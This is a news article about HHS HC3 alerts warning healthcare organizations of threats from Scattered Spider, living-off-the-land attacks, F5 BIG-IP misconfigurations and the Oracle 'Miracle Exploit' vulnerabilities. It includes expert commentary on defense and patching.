Cybercrime
,
Fraud Management & Cybercrime
,
Healthcare
HHS Alerts on Scattered Spider, Living of the Land, Miracle Exploit, F5 Attacks
Federal authorities in a flurry of recent alerts are warning the healthcare sector to be vigilant against of a growing array of cyberthreats. Those include hacks by Scattered Spider cybercriminals, living-off-the-land attacks, and bad actors looking to exploit weaknesses such as F5 misconfigurations and also so-called “Miracle Exploit” vulnerabilities in some Oracle software.
See Also: 2024 Threat Hunting Report: Insights to Outsmart Modern Adversaries
The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center, in a series of recent alerts, urges healthcare organizations to stay aware and proactive in defending against those and other assorted related threats, which have already affected organizations in the healthcare and public health sector, as well as in other industries.
Scattered Spider
Scattered Spider is a financially motivated, native English-speaking threat actor group that has been active with ransomware attacks and other intrusions since at least 2022, targeting organizations in various industries, including healthcare, HHS HC3 said.
The group – also known as Octo Tempest, Roasted 0ktapus, Storm-0875, Starfraud, UNC3944, Scatter Swine and Muddled Libra – has become known for its advanced social engineering techniques such as voice phishing by using artificial intelligence tools to spoof victims’ voices for obtaining initial access to targeted organizations, said HHS HC3. The group will likely continue to evolve its tactics, techniques and procedures to evade detection, the agency said.
“Scattered Spider has leveraged various malware and tools in its campaigns, including both publicly available and legitimate tools,” HHS HC3 said. “For example, the group has leveraged various remote monitoring and management tools, used multiple information stealers, and deployed ALPHV/BlackCat ransomware to victim environments for financial gain.
Scattered Spider threat actors have historically evaded detection on target networks by using living off the land – or LOTL – techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.
Some experts agree with the HHS HC3 assessment about the level of threat the group poses to healthcare sector entities.
“Scattered Spider’s use of social engineering, especially AI-driven voice phishing, makes it a major threat because it can bypass typical defenses and prey on human vulnerabilities,” said Christaan Beek, senior director of threat analytics at security firm Rapid7.
“Healthcare workers are often juggling many tasks and may not immediately recognize this level of social engineering, putting their organizations at risk. Plus, the group’s flexibility in using various ransomware strains adds to the potential for major disruptions and data theft,” he said.
“Security awareness training that specifically focuses on the social engineering component is important, but it’s also critical that health IT teams go further to ensure they have complete visibility into their external attack surface as well as the technology, people and processes in place to efficiently and effectively detect and respond to attacks,” he said.
Living-off-the-Land Attacks
Besides Scattered Spider, other threat actors also rely on using LOTL techniques in their attacks and healthcare is a prime target, as HHS HC3 warns in a separate alert. In LOTL attacks, hackers use legitimate software and functions available in victims’ system to perform malicious actions, making them more difficult to detect with legacy security tools.
“This type of attack takes advantage of scripting languages to execute malicious code directly in memory, bypassing traditional antivirus software that primarily scans files on disk, making it extremely challenging for security teams to detect and mitigate these attacks,” HHS HC3 warns.
LOTL attacks give hackers more time to escalate privileges, exfiltrate data and set up backdoors for future access. “LOTL attacks are particularly effective against healthcare systems that rely on a wide range of trusted tools and technologies,” HHS HC3 said.
F5 Misconfigurations Exploits
Threat actors exploiting F5 misconfigurations are also a big concern for healthcare sector entities, HHS HC3 said.
“For years, F5 Networks, Inc., a multi-cloud application services and security company’s BIG-IP software and hardware, have been subject to exploitation of its vulnerabilities by various threat actors,” HHS HC3 said.
The F5 product suite includes a variety of services, such as load balancing, DNS and connectivity for network applications. “Its ability to handle high-bandwidth interactions makes it popular among large enterprises and governments, both key targets of both nation-state and cybercrime groups,” HHS HC3 said.
“For this reason, any vulnerability is a significant security risk for F5’s BIG-IP users, as well as third parties whose personal and financial information may be stored on or processed by a vulnerable device.”
To reduce the risk of such exploitations involving F5 misconfiguration exploits, HHS HC3 notes that other federal authorities, including CISA, “strongly urge all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of catalog vulnerabilities as part of their vulnerability management practice.”
Miracle Exploit
HHS HC3 also warns that many healthcare organizations are also at risk for attacks involving “Miracle Exploit,” a set of critical vulnerabilities in Oracle products, primarily affecting Oracle Fusion Middleware and its ADF Faces framework, which is used to build web interfaces for Java EE applications.
The exploit, first disclosed in 2022, includes CVE-2022-21445 and CVE-2022-21497, both of which allow attackers to execute remote code without authentication, HHS HC3 said.
“This can lead to full system compromise, potentially exposing sensitive data and enabling lateral movement within a network. Healthcare organizations could be vulnerable to the Miracle Exploit, especially if they use Oracle Fusion Middleware products that rely on the ADF Faces framework,” HHS HC3 said.
Because healthcare organizations often depend on complex IT infrastructures and middleware for managing critical operations and sensitive patient data, they could be at significant risk if the vulnerabilities are not patched, the alert warned.
“Healthcare organizations rely heavily on enterprise software for managing electronic health records, patient billing and other critical services. If these systems are integrated with vulnerable Oracle middleware components, the consequences of exploitation could include data breaches, operational disruptions and regulatory penalties, particularly under HIPAA,” HHS HC3 said.
Heed the Warnings
Experts said that all the threats HHS HC3 spotlights can pose significant concerns for healthcare sector entities, especially depending upon the technology used within organization’s infrastructure and how well the entity keeps it patched.
“Historically, F5 has been a complex system within itself to manage and often provides connectivity between network segments,” said Jeff Wichman, director of incident response at security firm Semperis.
“Living off the land will always be concerning since attackers are using legitimate installations for software to perform malicious activities. It is much more difficult for incident responders to detect threats when the attacker doesn’t need to deploy malware or C2 software for access,” he said.
But for healthcare organizations that use Oracle components, HHS HC3’s warning Miracle Exploit is the most concerning and urgent, he said. “EHR and patient billing is exactly what the hackers are going to go after as compromises here will be the have biggest impact on the organization and take the longest to recover from,” he said.
“The Miracle Exploit is one of the more complicated items to patch in a healthcare environment. Since EHR systems are the most important item within the infrastructure, they are more risk-sensitive to patching and updating.”
Of course, the healthcare sector – like most industries – is facing a very long and growing list of threats well beyond HHS HC3’s most recent alerts.
For instance, as telehealth services expand, more healthcare devices are internet-connected, making them attractive targets, Beek said. “Unfortunately, security architecture wasn’t traditionally integrated into the design process for many of these types of devices.”
Healthcare sector entities also must stay mindful of the risks posed by their vendors, service providers and other third parties, experts said.
“Threat actors are actively targeting service providers because they have network access to multiple organizations and often possess weaker cybersecurity controls,” said Matthew Chevraux, director of FTI Consulting’s cybersecurity practice, and a former U.S. Secret Service special agent and manager.
“Gaining unauthorized access through a connected entity can be easier to accomplish and provides entry to multiple healthcare organizations,” he said. “Threat actors usually look for the path of least resistance to achieve their objective, and that often comes in the form of a connected third party.”